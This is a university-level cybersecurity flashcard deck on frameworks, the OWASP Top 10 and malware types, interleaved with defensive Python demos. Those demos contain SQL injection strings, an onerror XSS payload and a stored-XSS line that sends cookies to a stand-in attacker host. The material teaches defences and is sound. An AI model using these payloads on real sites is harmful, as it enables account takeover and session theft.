CySec Foundations Teil 2


Deck details

Cards 210

Language German

Category Computer Science

Level University

Created / Updated 31.07.2020 / 10.08.2020

Weblink
https://card2brain.ch/box/20200731_cysec_foundations_teil_2

What are the 5 core functions of the NIST Cybersecurity Framework?

1. Identify

2. Protect

3. Detect

4. Respond

5. Recover

What is technical vulnerability management?

a security practice designed to proactively mitigate or prevent the exploitation of vulnerabilities

Which 4 activities does the process of technical vulnerability management involve?

1. Identification

2. Classification

3. Remediation

4. Mitigation

(each applied to vulnerabilities)

What is a security event?

an occurrence that has potential security implications

What is a security incident?

an occurrence that actually or potentially jeopardizes the confidentiality, integrity or availability of information

Sources of security events

- OS logs

- application logs

- security tool logs

- outbound proxy logs

What does APT stand for?

Advanced Persistent Threat

What is an Advanced Persistent Threat (APT)?

a network attack in which unauthorized personnel gain access to a network and stay there undetected for a long time

the intention is to steal data

often targets organizations in high-value information sectors

Which 7 phases does the 'Cyber Attack Kill Chain' include?

1. Reconnaissance

2. Weaponization

3. Delivery

4. Exploitation

5. Installation

6. Command and Control

7. Actions on Objectives

What does AAA stand for?

Authentication

Authorization

Accounting

What are the 7 authentication scheme classifications?

1. Basic Authentication

2. One Time Passwords

3. Challenge / Response

4. Anonymous Key Exchange

5. Zero-Knowledge Password Proofs

6. Server certificates plus user authentication

7. Mutual Public Key Authentication
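To make the difference between classifications 1 and 3 concrete, here is an added Python example written for this page (not part of the deck): Basic Authentication sends the password itself, only base64-encoded, whereas an HMAC challenge/response proves knowledge of the secret without ever transmitting it and rejects a replayed response because the nonce is single-use. The user name, the shared secret and the 16-byte nonce size are assumptions made for the demo.

```python
import base64
import hashlib
import hmac
import secrets

# Constructed credential store for the demo (assumption: one invented user).
USERS = {"alice": b"correct horse battery staple"}


def basic_auth_header(user, password):
    """Scheme 1, Basic Authentication: the password itself crosses the wire,
    merely base64-encoded (encoding, not encryption)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization: Basic {token}"


def decode_basic_auth(header):
    """What anyone who observes the header on an unencrypted channel recovers."""
    token = header.split(" ", 2)[2]
    return base64.b64decode(token).decode()


class ChallengeResponseServer:
    """Scheme 3, Challenge/Response, using HMAC-SHA256 over a fresh nonce."""

    def __init__(self, users):
        self.users = users
        self.pending = {}  # user -> outstanding nonce, valid for one response

    def challenge(self, user):
        """Server -> client: a random, single-use nonce."""
        nonce = secrets.token_bytes(16)
        self.pending[user] = nonce
        return nonce

    def verify(self, user, response):
        """Client -> server: HMAC(secret, nonce). The nonce is consumed on
        first use, so a captured response cannot be replayed later."""
        nonce = self.pending.pop(user, None)
        secret = self.users.get(user)
        if nonce is None or secret is None:
            return False
        expected = hmac.new(secret, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)  # constant-time compare


def client_response(secret, nonce):
    """Client side: prove knowledge of the secret without transmitting it."""
    return hmac.new(secret, nonce, hashlib.sha256).digest()


def run_exchange(server, user, secret):
    """One full round trip; returns (accepted, response) so the same response
    can be replayed in a second attempt."""
    nonce = server.challenge(user)
    response = client_response(secret, nonce)
    return server.verify(user, response), response


if __name__ == "__main__":
    header = basic_auth_header("alice", "s3cret")
    print(header, "->", decode_basic_auth(header))
    server = ChallengeResponseServer(USERS)
    ok, resp = run_exchange(server, "alice", USERS["alice"])
    print("fresh exchange accepted:", ok)
    print("replayed response accepted:", server.verify("alice", resp))
```

The HMAC variant still requires the server to hold the raw shared secret; real protocols in this class (e.g. SCRAM) derive per-user keys from a salted password hash so that a stolen server database does not directly yield the secret.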

What does MIME stand for?

Multipurpose Internet Mail Extensions

What does SPF stand for?

Sender Policy Framework

What does DKIM stand for?

DomainKeys Identified Mail

What is the Sender Policy Framework (SPF)?

- a domain publishes its SPF record as a TXT record in DNS, listing the hosts that are allowed to send mail for that domain

- a receiving mail server may look up the SPF record of the sender's domain and check whether the connecting IP address is authorized

Name the OWASP Top 10 (2017 edition)

A1: Injection

A2: Broken Authentication

A3: Sensitive Data Exposure

A4: XML External Entities

A5: Broken Access Control

A6: Security Misconfiguration

A7: Cross-Site Scripting

A8: Insecure Deserialization

A9: Using Components with Known Vulnerabilities

A10: Insufficient Logging & Monitoring

How do you protect a system against SQL Injection?

- input validation

- prepared statements / parameterized queries -> no dynamic SQL built from user input
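The two defences side by side, as an added example written for this page (not from the deck), using Python's built-in sqlite3 driver: a login query built with string formatting, the same query as a prepared statement, and an allowlist check for the user name. The table contents and the credentials are constructed demo data.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demo (assumption: invented data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "wonderland", "user"), ("admin", "hunter2", "admin")],
    )
    return conn


def login_vulnerable(conn, name, password):
    """Dynamic SQL: user input is pasted into the statement and becomes syntax."""
    sql = (
        "SELECT name, role FROM users "
        f"WHERE name = '{name}' AND password = '{password}'"
    )
    return conn.execute(sql).fetchall()


def login_prepared(conn, name, password):
    """Prepared statement: the same query with placeholders; the driver passes
    the values as data, so quotes and comment markers never alter the SQL."""
    sql = "SELECT name, role FROM users WHERE name = ? AND password = ?"
    return conn.execute(sql, (name, password)).fetchall()


def is_valid_username(name):
    """Input validation on top: an allowlist for the field's expected shape.
    It is a second layer, not a substitute for parameterization."""
    return name.isalnum() and 1 <= len(name) <= 32


if __name__ == "__main__":
    conn = make_db()
    tautology = "x' OR '1'='1"
    print("vulnerable:   ", login_vulnerable(conn, "admin", tautology))
    print("prepared:     ", login_prepared(conn, "admin", tautology))
    print("comment trick:", login_vulnerable(conn, "admin'--", "anything"))
    print("valid username?", is_valid_username("admin'--"))
```

With the tautology payload the vulnerable query returns every row (the injected OR defeats the password check) and the comment payload logs in as admin without any password; the prepared statement returns nothing for both, because the payload is compared literally against the stored values.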

Give an example for A3: Sensitive Data Exposure

an input given by a user triggers an error and that input is written to a log file, e.g. credit card data
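The standard countermeasure for that scenario is to scrub card numbers before they reach any log handler. Here is an added Python example written for this page (not from the deck): a Luhn-checked PAN masker attached as a logging.Filter, so a failed-validation message still records what went wrong without storing the full number. The logger name, the message texts and the card numbers (well-known test numbers, not real cards) are constructed for the demo.

```python
import logging
import re

# 13 to 19 digits, optionally separated by single spaces or hyphens; the final
# \b sits right after the last digit so no trailing separator is swallowed.
PAN_RE = re.compile(r"\b\d(?:[ -]?\d){12,18}\b")


def luhn_valid(digits):
    """Luhn checksum: filters out long numbers that cannot be card numbers
    (order IDs, timestamps) so they are left readable in the log."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask_pans(text):
    """Replace every Luhn-valid card number with its first 6 and last 4 digits."""

    def _mask(match):
        raw = match.group(0)
        digits = re.sub(r"\D", "", raw)
        if not luhn_valid(digits):
            return raw
        return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]

    return PAN_RE.sub(_mask, text)


class PanRedactingFilter(logging.Filter):
    """Logging filter that scrubs card numbers from the message and its
    positional arguments before any handler formats or writes the record."""

    def filter(self, record):
        record.msg = mask_pans(str(record.msg))
        if isinstance(record.args, tuple):
            record.args = tuple(mask_pans(str(a)) for a in record.args)
        return True


def build_logger(name="payments-demo"):
    """Logger with the redaction filter attached at the logger level, so every
    handler (file, SIEM forwarder, console) only ever sees masked data."""
    logger = logging.getLogger(name)
    logger.setLevel(logging.INFO)
    if not any(isinstance(f, PanRedactingFilter) for f in logger.filters):
        logger.addFilter(PanRedactingFilter())
    return logger


def redacted_message(msg, *args):
    """Helper: run one message through the filter and return what a handler
    would see; used to demonstrate the effect without a configured handler."""
    record = logging.LogRecord("demo", logging.INFO, "demo.py", 0, msg, args, None)
    PanRedactingFilter().filter(record)
    return record.getMessage()


if __name__ == "__main__":
    logging.basicConfig(format="%(levelname)s %(message)s")
    log = build_logger()
    # Constructed input: a well-known Visa test number, not a real card.
    log.error("validation failed for input %r", "4111 1111 1111 1111")
    log.info("order 1234567890123456 processed")  # not Luhn-valid, left intact
```

Note that a filter on a logger only covers records logged through that logger; records that propagate up from child loggers bypass it, so in a real service the filter is usually attached to the handlers as well.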

Name the 3 types of XSS

- Stored

- Reflected

- DOM-based
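The stored and reflected variants, with the output encoding that defeats both, as an added Python example written for this page (not from the deck). It also shows why a blocklist that strips &lt;script&gt; tags is not a fix: an image tag with an event handler passes straight through. DOM-based XSS is not shown because it happens entirely in client-side JavaScript (e.g. copying location.hash into innerHTML) and never touches the server. The comment store, the search page markup and the payloads are constructed for the demo.

```python
import html

# Constructed comment store for the stored case (assumption: invented data).
COMMENTS = []


def store_comment(text):
    """Stored XSS setup: attacker-controlled text is persisted server-side."""
    COMMENTS.append(text)


def render_comments_vulnerable():
    """Stored XSS: persisted content is concatenated straight into the HTML,
    so every later visitor's browser executes it."""
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def render_comments_safe():
    """Same page with output encoding: markup inside comments is shown as text."""
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in COMMENTS) + "</ul>"


def search_page_vulnerable(query):
    """Reflected XSS: a request parameter is echoed back unencoded, so a crafted
    link executes in the browser of whoever clicks it."""
    return f"<p>Results for: {query}</p>"


def search_page_safe(query):
    """quote=True also escapes quotes, which matters inside attribute values."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def naive_script_filter(text):
    """A blocklist that only removes <script> tags. Kept here to show why
    filtering input is weaker than encoding output."""
    return text.replace("<script>", "").replace("</script>", "")


def has_active_markup(rendered):
    """Crude detector used to compare the renderings: an unescaped script tag
    or an inline event handler that a browser would execute."""
    lowered = rendered.lower()
    return "<script" in lowered or ("<img" in lowered and "onerror=" in lowered)


if __name__ == "__main__":
    store_comment("Nice post!")
    store_comment("<script>document.location='https://evil.example/?c='+document.cookie</script>")
    print("stored, vulnerable:", has_active_markup(render_comments_vulnerable()))
    print("stored, escaped:   ", has_active_markup(render_comments_safe()))
    payload = "<img src=x onerror=alert(1)>"
    print("filtered then reflected:", has_active_markup(search_page_vulnerable(naive_script_filter(payload))))
    print("escaped reflection:     ", has_active_markup(search_page_safe(payload)))
```

Encoding has to match the context the data lands in: html.escape is right for element content and quoted attribute values, but data placed inside a script block, a URL or a CSS value needs the encoding rules of that context instead.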

Name the hacker types

- Black Hat

- Grey Hat

- White Hat

- Script Kiddie

- Cyber Terrorist

- State Sponsored

What is the difference between a Script Kiddie and other hacker types?

A script kiddie runs tools written by others and may not understand what those tools are actually doing

What is a zero day attack?

- exploits a zero-day vulnerability

- the vulnerability is not yet known to the software vendor, so no patch exists at the time of the attack

What are the two main functions of viruses?

propagation and destruction

What is virus propagation?

defines how a virus will spread from system to system

Name 4 virus propagation techniques

- master boot record infection

- file infection

- macro infection

- service injection

How does MBR infection work?

the virus infects the master boot record (MBR) of the bootable media

1. the system reads the infected MBR

2. the virus instructs it to read and execute code stored in an alternate location

3. the system loads the entire virus into memory

How does file infection work?

the virus infects executable files; the virus code runs whenever an infected program is executed

How does service injection work?

the virus injects itself into trusted runtime processes

e.g. svchost.exe, winlogon.exe, explorer.exe

How does macro infection work?

virus is written in a macro language

macros are executed upon opening of the document

What is a multipartite virus?

a virus that uses more than one propagation technique

what are stealth viruses?

viruses that hide themselves and lead AV software to believe that everything is normal

e.g. the virus might overwrite the MBR and modify the OS file system functionality

when the AV software reads the MBR, the virus serves it a clean copy of the MBR and stays hidden

What are polymorphic viruses?

viruses that modify their own code with each infection so that the copies do not share the same signature

What are encrypted viruses?

- use cryptographic techniques to avoid signature-based detection

- only a very short segment of code stays unencrypted: the decryption routine

- each infection uses a different key, so the encrypted body looks different on each infected machine

What are logic bombs?

- malicious code that lies dormant until triggered by a certain event (e.g. program launch, website logon)

What are trojan horses?

- a program that appears benign but carries a malicious payload behind the scenes

- e.g. rogue AV (fake antivirus software)

What is keystroke logging?

- the action of recording the keystrokes typed on a keyboard

- the recorded data can then be retrieved by the actor controlling the program

What is ransomware?

- infects the target machine and encrypts its files

- the user has to pay a ransom to receive the decryption key

What is special about worms?

They replicate without human intervention

What is Stuxnet?

A worm that targeted the Iranian nuclear program

How did Stuxnet replicate?

- unprotected administrative shares

- zero-day vulnerabilities in the Windows Server service and the Print Spooler service

- databases with a default password

- infected USB drives